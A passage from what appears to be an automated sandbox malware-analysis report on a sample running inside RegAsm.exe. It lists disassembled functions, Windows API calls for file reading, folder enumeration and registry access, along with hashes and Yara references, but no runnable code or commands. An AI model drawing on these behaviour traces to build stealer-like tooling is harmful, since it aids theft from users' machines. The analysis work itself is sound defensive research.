                                          • CloseHandle.KERNEL32(00000000), ref: 0040957A
                                            • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT ref: 0040AFD8
                                            • Part of subcall function 0040A2EF: ReadFile.KERNEL32(00000000,00000000,004450DD,00000000,00000000), ref: 0040A306
                                          Memory Dump Source
                                          • Source File: 0000000D.00000002.405144443.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                          Similarity
                                          • API ID: File$??2@CloseCreateHandleReadSize
                                          • String ID:
                                          • API String ID: 1023896661-0
                                          • Opcode ID: 517a28336922631f1c28e20ccf3750fd377d8614a795a490cf559f5829b7d7c1
                                          • Instruction ID: f35f9952f6e959c636c436af82c7d55a8b84e599ec35ab47be9645748316c481
                                          • Opcode Fuzzy Hash: 517a28336922631f1c28e20ccf3750fd377d8614a795a490cf559f5829b7d7c1
                                          • Instruction Fuzzy Hash: 0D11D671A00608BFCB129F2ACC8585F7BA5EF94350B14843FF415AB392DB75DE40CA58
                                          Function 0040CC26 Relevance: 3.1, APIs: 2, Instructions: 53COMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 004096C3: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                          • GetFileSize.KERNEL32(00000000,00000000,000003FF,?,00000000,0040B7D4,?,?,?,?,000003FF,?,?,?,00445FAE,?), ref: 0040CC44
                                            • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT ref: 0040AFD8
                                            • Part of subcall function 0040A2EF: ReadFile.KERNEL32(00000000,00000000,004450DD,00000000,00000000), ref: 0040A306
                                            • Part of subcall function 0040AB4A: MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,?,00000001,?,00401D51,00000000,00000001,00000000), ref: 0040AB63
                                            • Part of subcall function 0040AB4A: MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,?,00000001,?,00401D51,00000000,00000001,00000000), ref: 0040AB88
                                          • CloseHandle.KERNEL32(?), ref: 0040CC98
                                            • Part of subcall function 0040B04B: ??3@YAXPAX@Z.MSVCRT(00000000,00401B44,0044E518,?,00000001,00401B95,?,00401EE4), ref: 0040B052
                                          Memory Dump Source
                                          • Source File: 0000000D.00000002.405144443.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                          Similarity
                                          • API ID: File$ByteCharMultiWide$??2@??3@CloseCreateHandleReadSize
                                          • String ID:
                                          • API String ID: 2445788494-0
                                          • Opcode ID: 5551154f09d9ac0fe1cac7a20b9391cb02a4855cbb9d966ae120c46d578013b8
                                          • Instruction ID: dc8783d9a6c7baf78a377756874cfbd60b78407a6d3acdf6d1052ad5173bbb79
                                          • Opcode Fuzzy Hash: 5551154f09d9ac0fe1cac7a20b9391cb02a4855cbb9d966ae120c46d578013b8
                                          • Instruction Fuzzy Hash: 91118275804208AFDB10AF6ADC45C8A7F75FF01364711C27AF525A72A1D6349A18CBA5
                                          Function 004152C6 Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 27COMMON
                                          Download Yara Rule
                                          APIs
                                          Strings
                                          • failed to allocate %u bytes of memory, xrefs: 004152F0
                                          Memory Dump Source
                                          • Source File: 0000000D.00000002.405144443.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                          Similarity
                                          • API ID: malloc
                                          • String ID: failed to allocate %u bytes of memory
                                          • API String ID: 2803490479-1168259600
                                          • Opcode ID: 5362f241c04528c046f9391a2b70be4ceaf2b9bead8481f91e416c113c2d710c
                                          • Instruction ID: 101c51dc2fc609bd9d1e0073b1fda66f00508c6688545faad3e4fa21ce9dc4bd
                                          • Opcode Fuzzy Hash: 5362f241c04528c046f9391a2b70be4ceaf2b9bead8481f91e416c113c2d710c
                                          • Instruction Fuzzy Hash: 11E0DFB7B02A12A3C200561AED01AC667959FC122572B013BF92CD3681E638D89687A9
                                          Function 0041BC3B Relevance: 2.7, APIs: 2, Instructions: 195COMMON
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 0000000D.00000002.405144443.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                          Similarity
                                          • API ID: memcmpmemset
                                          • String ID:
                                          • API String ID: 1065087418-0
                                          • Opcode ID: c380604b195766abe84e73715a049d0373e74049267bc02831dab12048305386
                                          • Instruction ID: cf105cae5e27f97c9cd1c3f46a8d5e16e2707a712041142e317bfb3d1f631299
                                          • Opcode Fuzzy Hash: c380604b195766abe84e73715a049d0373e74049267bc02831dab12048305386
                                          • Instruction Fuzzy Hash: 2A615B71A01349EBDB14EFA495815EEB7B4EB04308F1440AFE609D3241E738AED4DB99
                                          Function 004104FB Relevance: 2.6, APIs: 2, Instructions: 140COMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 0040ECD8: ??2@YAPAXI@Z.MSVCRT ref: 0040ECF9
                                            • Part of subcall function 0040ECD8: ??3@YAXPAX@Z.MSVCRT(00000000), ref: 0040EDC0
                                          • GetStdHandle.KERNEL32(000000F5), ref: 00410530
                                          • CloseHandle.KERNEL32(?), ref: 00410654
                                            • Part of subcall function 004096DC: CreateFileW.KERNEL32(00000001,40000000,00000001,00000000,00000002,00000000,00000000,0040E0F1,00000104), ref: 004096EE
                                            • Part of subcall function 0040973C: GetLastError.KERNEL32 ref: 00409750
                                            • Part of subcall function 0040973C: _snwprintf.MSVCRT ref: 0040977D
                                            • Part of subcall function 0040973C: MessageBoxW.USER32(?,?,Error,00000030), ref: 00409796
                                          Memory Dump Source
                                          • Source File: 0000000D.00000002.405144443.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                          Similarity
                                          • API ID: Handle$??2@??3@CloseCreateErrorFileLastMessage_snwprintf
                                          • String ID:
                                          • API String ID: 1381354015-0
                                          • Opcode ID: 331637186d7fda146188de6d28ea3842bad20729486783243114fed48956b45e
                                          • Instruction ID: c777e68e994987bb064ab7fb99de871126f79ef1b866bcb434911d427814d160
                                          • Opcode Fuzzy Hash: 331637186d7fda146188de6d28ea3842bad20729486783243114fed48956b45e
                                          • Instruction Fuzzy Hash: BE417231A00204EFCB25AF65C885A9E77B6EF84711F20446FF446A7291C7B99EC0DE59
                                          Function 00418C63 Relevance: 2.6, APIs: 2, Instructions: 132COMMON
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 0000000D.00000002.405144443.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                          Similarity
                                          • API ID: memset
                                          • String ID:
                                          • API String ID: 2221118986-0
                                          • Opcode ID: 1314b8a525b96e130b2fbb6cbe3c7ee378288528e928e0e3fe9c348834c14d1c
                                          • Instruction ID: 1d54aaebfbdefc3985b5f7374fea00c82d73a4224d5df9dcd637b0600b3a95b1
                                          • Opcode Fuzzy Hash: 1314b8a525b96e130b2fbb6cbe3c7ee378288528e928e0e3fe9c348834c14d1c
                                          • Instruction Fuzzy Hash: B2415872500701EFDB349F60E8848AAB7F5FB18314720492FE54AC7690EB38E9C58B98
                                          Function 0040B1AB Relevance: 2.5, APIs: 2, Instructions: 14COMMON
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 0000000D.00000002.405144443.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                          Similarity
                                          • API ID: free
                                          • String ID:
                                          • API String ID: 1294909896-0
                                          • Opcode ID: 17a0de013ad5af1dada85eb60247efe04a4887ab005b4e4af9b3a400899dc410
                                          • Instruction ID: 7f33cc2486ffea160e999b9abaf125df84647c5341351ad01334bd221cd3bada
                                          • Opcode Fuzzy Hash: 17a0de013ad5af1dada85eb60247efe04a4887ab005b4e4af9b3a400899dc410
                                          • Instruction Fuzzy Hash: 32D042B0404B008ED7B0DF39D401602BBF0AB093143118D2E90AAC2A50E775A0149F08
                                          Function 004136C0 Relevance: 1.7, APIs: 1, Instructions: 163COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 0000000D.00000002.405144443.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 47b7cceb40ac73e48e091e39f89a81a5349c65788578bfc7b3808e4b699817ff
                                          • Instruction ID: 68238382b965d6cf35967491492c160b6f6d54887ef21f0023ff885919cfaa00
                                          • Opcode Fuzzy Hash: 47b7cceb40ac73e48e091e39f89a81a5349c65788578bfc7b3808e4b699817ff
                                          • Instruction Fuzzy Hash: 695126B5A00209AFCB14DFD4C884CEFBBB9FF88705B14C559F512AB254E735AA46CB60
                                          Function 00403988 Relevance: 1.6, APIs: 1, Instructions: 56timeCOMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 00403A16: memset.MSVCRT ref: 00403A55
                                            • Part of subcall function 0040A02C: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,02000000,00000000,00000000,00000000,004039CA,00000000,?,00000000,?,00000000), ref: 0040A044
                                            • Part of subcall function 0040A02C: GetFileTime.KERNEL32(00000000,00000000,00000000,?), ref: 0040A058
                                            • Part of subcall function 0040A02C: CloseHandle.KERNEL32(00000000), ref: 0040A061
                                          • CompareFileTime.KERNEL32(?,?,00000000,?,00000000), ref: 004039D4
                                          Memory Dump Source
                                          • Source File: 0000000D.00000002.405144443.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                          Similarity
                                          • API ID: File$Time$CloseCompareCreateHandlememset
                                          • String ID:
                                          • API String ID: 2154303073-0
                                          • Opcode ID: 56a49437465c6dd79f718b685576690655c489aaf9a54b49d185ed9555da5ee2
                                          • Instruction ID: d476be81a684c5cf971044fbd14bb177a9e73989d843208b34704cc982626f94
                                          • Opcode Fuzzy Hash: 56a49437465c6dd79f718b685576690655c489aaf9a54b49d185ed9555da5ee2
                                          • Instruction Fuzzy Hash: 11111CB6D00218ABCB11EFA5D9415DEBBB9EF44315F20407BE841F7281DA389F45CB95
                                          Function 004062A6 Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                                          Download Yara Rule
                                          APIs
                                          • SetFilePointerEx.KERNEL32(0040627C,?,?,00000000,00000000), ref: 004062C2
                                            • Part of subcall function 0040A2EF: ReadFile.KERNEL32(00000000,00000000,004450DD,00000000,00000000), ref: 0040A306
                                          Memory Dump Source
                                          • Source File: 0000000D.00000002.405144443.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                          Similarity
                                          • API ID: File$PointerRead
                                          • String ID:
                                          • API String ID: 3154509469-0
                                          • Opcode ID: f15afef8f4b97f48ba7652cd85e3a24bc41a353f13de395cadc5358a8aad8795
                                          • Instruction ID: d794e9b43e5f56b2d2e2073d65b81241c22a9a75ad02cc9b2284f18e77a2fe0f
                                          • Opcode Fuzzy Hash: f15afef8f4b97f48ba7652cd85e3a24bc41a353f13de395cadc5358a8aad8795
                                          • Instruction Fuzzy Hash: 45E01276100100FFE6619B05DC06F57FBB9FBD4710F14883DB59596174C6326851CB25
                                          Function 00414561 Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                                          Download Yara Rule
                                          APIs
                                          • GetPrivateProfileIntW.KERNEL32(?,?,?,?), ref: 00414588
                                            • Part of subcall function 004143F1: memset.MSVCRT ref: 00414410
                                            • Part of subcall function 004143F1: _itow.MSVCRT ref: 00414427
                                            • Part of subcall function 004143F1: WritePrivateProfileStringW.KERNEL32(?,?,00000000), ref: 00414436
                                          Memory Dump Source
                                          • Source File: 0000000D.00000002.405144443.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                          Similarity
                                          • API ID: PrivateProfile$StringWrite_itowmemset
                                          • String ID:
                                          • API String ID: 4232544981-0
                                          • Opcode ID: 58bd15f6e23597088465cc0f12acd7a0529fd6d647dc9a4ec136155e63c93ad6
                                          • Instruction ID: 104e910b762de94586eb11e4c264cf061db1895f8dce3fe8c281d71359574313
                                          • Opcode Fuzzy Hash: 58bd15f6e23597088465cc0f12acd7a0529fd6d647dc9a4ec136155e63c93ad6
                                          • Instruction Fuzzy Hash: 8EE09232000209ABDF125F91EC01AA93B66FF54315F548469F95C05520D33295B0AB59
                                          Function 00444A54 Relevance: 1.5, APIs: 1, Instructions: 18COMMON
                                          Download Yara Rule
                                          APIs
                                          • FreeLibrary.KERNEL32(?,?,004452FB,?,?,?,0040333C,?), ref: 00444A65
                                          Memory Dump Source
                                          • Source File: 0000000D.00000002.405144443.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                          Similarity
                                          • API ID: FreeLibrary
                                          • String ID:
                                          • API String ID: 3664257935-0
                                          • Opcode ID: 8c39ef9eaf727128d218f1dddc73c1f621731b9859e7ea9690b0e693fd97a8de
                                          • Instruction ID: 9043d1e372537a54137ae43dcd20834ee918eeaa55a47e8e1dedab4d47514996
                                          • Opcode Fuzzy Hash: 8c39ef9eaf727128d218f1dddc73c1f621731b9859e7ea9690b0e693fd97a8de
                                          • Instruction Fuzzy Hash: E2E0F6B5900B018FD3708F1BE944406FBF8BFE56113108A1FD4AAC2A24D7B4A1898F54
                                          Function 00413F27 Relevance: 1.5, APIs: 1, Instructions: 15COMMON
                                          Download Yara Rule
                                          APIs
                                          • K32GetModuleFileNameExW.KERNEL32(00000104,00000000,00413E1F,00000104,00413E1F,00000000,?), ref: 00413F46
                                          Memory Dump Source
                                          • Source File: 0000000D.00000002.405144443.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                          Similarity
                                          • API ID: FileModuleName
                                          • String ID:
                                          • API String ID: 514040917-0
                                          • Opcode ID: 115f5329003125d907eaa6c1792e5f10a4de8ddb58c38107801da2991a4e6f4b
                                          • Instruction ID: eb737a8a997ed41d0f7a348c178ce8d4b8225706e43eb580f21eee6dbde26bc7
                                          • Opcode Fuzzy Hash: 115f5329003125d907eaa6c1792e5f10a4de8ddb58c38107801da2991a4e6f4b
                                          • Instruction Fuzzy Hash: 6FD02231B083007BEA20EE70CC00FCBA2F47F40F12F008C5AB191D2080C374C9495305
                                          Function 0040A2EF Relevance: 1.5, APIs: 1, Instructions: 13fileCOMMON
                                          Download Yara Rule
                                          APIs
                                          • ReadFile.KERNEL32(00000000,00000000,004450DD,00000000,00000000), ref: 0040A306
                                          Memory Dump Source
                                          • Source File: 0000000D.00000002.405144443.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                          Similarity
                                          • API ID: FileRead
                                          • String ID:
                                          • API String ID: 2738559852-0
                                          • Opcode ID: 954c46e0e75d823fede48ea8c55c2feae074eed5d1d1543d384a91c6a040f523
                                          • Instruction ID: df780c2d30ec27a436fe2e8938b9b3026ee6fdf868a35847a3a0dbf755fefbc9
                                          • Opcode Fuzzy Hash: 954c46e0e75d823fede48ea8c55c2feae074eed5d1d1543d384a91c6a040f523
                                          • Instruction Fuzzy Hash: 6DD0C97505020DFBDF01CF81DC06FDD7B7DFB05359F108054BA0095060C7759A15AB55
                                          Function 0040A30E Relevance: 1.5, APIs: 1, Instructions: 13fileCOMMON
                                          Download Yara Rule
                                          APIs
                                          • WriteFile.KERNEL32(?,00000009,?,00000000,00000000), ref: 0040A325
                                          Memory Dump Source
                                          • Source File: 0000000D.00000002.405144443.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                          Similarity
                                          • API ID: FileWrite
                                          • String ID:
                                          • API String ID: 3934441357-0
                                          • Opcode ID: ceb9d1a6229db680868981d1c52190471358147ed4569e3c2bde9500725be326
                                          • Instruction ID: 3280266517864b8de079c100525e5277478ec149926fcdeece843fe2c70d8c86
                                          • Opcode Fuzzy Hash: ceb9d1a6229db680868981d1c52190471358147ed4569e3c2bde9500725be326
                                          • Instruction Fuzzy Hash: CFD0C93501020DFBDF01CF81DC06FDD7BBDFB04359F108054BA1095060D7B59A20AB94
                                          Function 00413D29 Relevance: 1.5, APIs: 1, Instructions: 13COMMON
                                          Download Yara Rule
                                          APIs
                                          • FreeLibrary.KERNEL32(00000000,004457F2,00000000,000001F7,00000000), ref: 00413D30
                                          Memory Dump Source
                                          • Source File: 0000000D.00000002.405144443.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                          Similarity
                                          • API ID: FreeLibrary
                                          • String ID:
                                          • API String ID: 3664257935-0
                                          • Opcode ID: 4aed56dde2bff02888507ea152729a1ee15f70291d16ca6bd798c1e7fc2ec88c
                                          • Instruction ID: 8f6381f957debc367d4a0444659be52de1bfd3a154b3998764173f6a98a011bd
                                          • Opcode Fuzzy Hash: 4aed56dde2bff02888507ea152729a1ee15f70291d16ca6bd798c1e7fc2ec88c
                                          • Instruction Fuzzy Hash: 1DD0C9765002229BDB10AF26EC057857378FF00712B110425E810B7594D778BEE68ADC
                                          Function 004096C3 Relevance: 1.5, APIs: 1, Instructions: 10fileCOMMON
                                          Download Yara Rule
                                          APIs
                                          • CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                          Memory Dump Source
                                          • Source File: 0000000D.00000002.405144443.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                          Similarity
                                          • API ID: CreateFile
                                          • String ID:
                                          • API String ID: 823142352-0
                                          • Opcode ID: 5246709bc6ec1dabf70528f5ad42ffc01d78c7e2d09fe5df7c46969d7a5ea179
                                          • Instruction ID: 15e4bfb1af8ab284213ec8af4af1ca3ed9a3c322684c6da9746693c795416a08
                                          • Opcode Fuzzy Hash: 5246709bc6ec1dabf70528f5ad42ffc01d78c7e2d09fe5df7c46969d7a5ea179
                                          • Instruction Fuzzy Hash: A8C092B0280200BEFE224B10EC15F36755CE744700F2008247E40F40E0C1605E108524
                                          Function 004096DC Relevance: 1.5, APIs: 1, Instructions: 10fileCOMMON
                                          Download Yara Rule
                                          APIs
                                          • CreateFileW.KERNEL32(00000001,40000000,00000001,00000000,00000002,00000000,00000000,0040E0F1,00000104), ref: 004096EE
                                          Memory Dump Source
                                          • Source File: 0000000D.00000002.405144443.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                          Similarity
                                          • API ID: CreateFile
                                          • String ID:
                                          • API String ID: 823142352-0
                                          • Opcode ID: ab7a8cdf7eb8bf952c1c1b88a04d9996938fd5cdd98684eb6691b5f60f9c195d
                                          • Instruction ID: 13aef0f41518da9c32968a96bed17b980f0e8f352a8d1793a660c4ee04e7d177
                                          • Opcode Fuzzy Hash: ab7a8cdf7eb8bf952c1c1b88a04d9996938fd5cdd98684eb6691b5f60f9c195d
                                          • Instruction Fuzzy Hash: B8C012F02903007EFF204B10AC0AF37755DF784700F2048207E40F40E1C2B15C008524
                                          Function 0040B04B Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                          Download Yara Rule
                                          APIs
                                          • ??3@YAXPAX@Z.MSVCRT(00000000,00401B44,0044E518,?,00000001,00401B95,?,00401EE4), ref: 0040B052
                                          Memory Dump Source
                                          • Source File: 0000000D.00000002.405144443.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                          Similarity
                                          • API ID: ??3@
                                          • String ID:
                                          • API String ID: 613200358-0
                                          • Opcode ID: ffbe44a51c26d842ca56a491b3c7d92fb1c4d2adc00a6a519549e0909776451f
                                          • Instruction ID: 6ff791ec813821c2e9e24527ebed0d702daabad41f6d5d50af9b89e3d4ad0470
                                          • Opcode Fuzzy Hash: ffbe44a51c26d842ca56a491b3c7d92fb1c4d2adc00a6a519549e0909776451f
                                          • Instruction Fuzzy Hash: ADC09BB15117014BE7305F15D40471373D49F11727F318C1DA5D1914C2D77CD4408518
                                          Function 004135E0 Relevance: 1.5, APIs: 1, Instructions: 8COMMON
                                          Download Yara Rule
                                          APIs
                                          • FreeLibrary.KERNEL32(?,00413603,00000000,0044557A,?,?,?,?,?,00403335,?), ref: 004135EC
                                          Memory Dump Source
                                          • Source File: 0000000D.00000002.405144443.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                          Similarity
                                          • API ID: FreeLibrary
                                          • String ID:
                                          • API String ID: 3664257935-0
                                          • Opcode ID: 844f7501f44133ba018c3401d7aef3826eb6c790b17bce713828cee3c51aa695
                                          • Instruction ID: 97b2006ec1e2dd28fddd19cbcf35086f2a6b1d7d6d8af37d8808782836c913ed
                                          • Opcode Fuzzy Hash: 844f7501f44133ba018c3401d7aef3826eb6c790b17bce713828cee3c51aa695
                                          • Instruction Fuzzy Hash: C1C04C355107129BE7318F22C849793B3E8BB00767F40C818A56A85454D7BCE594CE28
                                          Function 0041493C Relevance: 1.5, APIs: 1, Instructions: 8COMMON
                                          Download Yara Rule
                                          APIs
                                          • EnumResourceNamesW.KERNEL32(?,?,Function_000148B6,00000000), ref: 0041494B
                                          Memory Dump Source
                                          • Source File: 0000000D.00000002.405144443.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                          Similarity
                                          • API ID: EnumNamesResource
                                          • String ID:
                                          • API String ID: 3334572018-0
                                          • Opcode ID: 66f1156765df5e37ef2ff2f84c2d9879992723494834984b76c3e66af834c78a
                                          • Instruction ID: 4cd0fc1a45efe5f4a77ff86a676eea9814a6d41529a344ef69fdb726e0e13cac
                                          • Opcode Fuzzy Hash: 66f1156765df5e37ef2ff2f84c2d9879992723494834984b76c3e66af834c78a
                                          • Instruction Fuzzy Hash: 5CC09B355943819FD711DF108C05F1A76D5BF95705F104C397151940A0C7614014A60A
                                          Function 0044DEA5 Relevance: 1.5, APIs: 1, Instructions: 8COMMON
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 0000000D.00000002.405144443.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                          Similarity
                                          • API ID: FreeLibrary
                                          • String ID:
                                          • API String ID: 3664257935-0
                                          • Opcode ID: bc29afbdeb633a61cc40634aee98d5405fe4c9068b08d77425fcd78e2ed3a7cd
                                          • Instruction ID: c12df66a07a312a107e4de7a98dbd39cb061029a89fa16cd2619b088cce9516a
                                          • Opcode Fuzzy Hash: bc29afbdeb633a61cc40634aee98d5405fe4c9068b08d77425fcd78e2ed3a7cd
                                          • Instruction Fuzzy Hash: 95C04C35D10311ABFB31AB11ED4975232A5BB00717F52006494128D065D7B8E454CB2D
                                          Function 0040AEBE Relevance: 1.5, APIs: 1, Instructions: 8COMMON
                                          Download Yara Rule
                                          APIs
                                          • FindClose.KERNEL32(?,0040AE21,?,00000000,00445EF5,*.*,?,00000000,?,00000104,?,?,?,?,?,00000104), ref: 0040AEC8
                                          Memory Dump Source
                                          • Source File: 0000000D.00000002.405144443.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                          Similarity
                                          • API ID: CloseFind
                                          • String ID:
                                          • API String ID: 1863332320-0
                                          • Opcode ID: c351b702f3e9cabc65afcca29c8835cc335007c1b5069ed2425bca2f993f3ba3
                                          • Instruction ID: 0a5868f0c47a417661f40efe111cada53839b745ef6d73ffe26d621af3302058
                                          • Opcode Fuzzy Hash: c351b702f3e9cabc65afcca29c8835cc335007c1b5069ed2425bca2f993f3ba3
                                          • Instruction Fuzzy Hash: 06C092341506058BD62C5F38DC9A42A77A0BF4A3303B40F6CA0F3D24F0E73888538A04
                                          Function 00414592 Relevance: 1.5, APIs: 1, Instructions: 7registryCOMMON
                                          Download Yara Rule
                                          APIs
                                          • RegOpenKeyExW.KERNEL32(80000002,80000002,00000000,00020019,80000002,00414CC1,80000002,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,00445DDE,?,?,00000000), ref: 004145A5
                                          Memory Dump Source
                                          • Source File: 0000000D.00000002.405144443.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                          Similarity
                                          • API ID: Open
                                          • String ID:
                                          • API String ID: 71445658-0
                                          • Opcode ID: cea4c8dffb5a7e03adddd135b873dbda16caaf5da1da7b073e7ed9ea122c33c6
                                          • Instruction ID: 4e31294bd56c0fd8f54a78566f459ab053e1b17b284f5820c9a90ca28514d216
                                          • Opcode Fuzzy Hash: cea4c8dffb5a7e03adddd135b873dbda16caaf5da1da7b073e7ed9ea122c33c6
                                          • Instruction Fuzzy Hash: C4C09B35544311BFDE114F40FD09F09BB61BB84B05F004414B254640B182714414EB17
                                          Function 00409B98 Relevance: 1.5, APIs: 1, Instructions: 7COMMON
                                          Download Yara Rule
                                          APIs
                                          • GetFileAttributesW.KERNEL32(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                          Memory Dump Source
                                          • Source File: 0000000D.00000002.405144443.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                          Similarity
                                          • API ID: AttributesFile
                                          • String ID:
                                          • API String ID: 3188754299-0
                                          • Opcode ID: 58881c252121c77da0d0db5638804f50f66f4a7a85cb6d231bcd6b2301be346c
                                          • Instruction ID: 3e515636d229e53f9e638efbf3d1d2cf0185fd636b5c9b7db17c068ea44c501e
                                          • Opcode Fuzzy Hash: 58881c252121c77da0d0db5638804f50f66f4a7a85cb6d231bcd6b2301be346c
                                          • Instruction Fuzzy Hash: B9B012792104005BCB0807349C4904D35507F456317200B3CF033C00F0D730CC61BA00
                                          Function 0041BE52 Relevance: 1.3, APIs: 1, Instructions: 99COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 0000000D.00000002.405144443.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: f464ccbab3ddc34ea334660331f976908ef01721c951a33d0f0b075526a08e67
                                          • Instruction ID: 186a7b248be49691fb09735f75239c469d17650efe27a5986e87276cb9a2b443
                                          • Opcode Fuzzy Hash: f464ccbab3ddc34ea334660331f976908ef01721c951a33d0f0b075526a08e67
                                          • Instruction Fuzzy Hash: E8318B31901616EFDF24AF25D8417DA73A0FF04314F10416BF91497251DB38ADE18BDA
                                          Function 004095D9 Relevance: 1.3, APIs: 1, Instructions: 66COMMON
                                          Download Yara Rule
                                          APIs
                                          • memset.MSVCRT ref: 004095FC
                                            • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                            • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                            • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                            • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
